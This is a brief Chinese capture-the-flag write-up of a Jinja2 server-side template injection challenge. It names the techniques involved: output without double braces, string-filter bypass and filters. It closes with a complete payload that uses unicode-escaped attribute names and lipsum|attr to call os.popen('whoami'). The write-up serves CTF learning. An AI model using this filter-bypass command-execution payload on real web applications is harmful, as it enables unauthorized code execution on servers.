点击此处获得更好的阅读体验
WriteUp来源
题目考点
SSTI
SSTI 绕过姿势汇总(unicode绕过是一种网上没提出的方法)
解题思路
题目主要考察了几个知识点:
没有
{{
情况下如何构造回显如何绕过字符串过滤
过滤器的熟悉程度
直接放payload吧,很简单的一道题,理解了就懂了:
1 | /test?url={%print(lipsum|attr(%22\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f%22))|attr(%22\u005f\u005f\u0067\u0065\u0074\u0069\u0074\u0065\u006d\u005f\u005f%22)(%22os%22)|attr(%22popen%22)(%22whoami%22)|attr(%22read%22)()%} |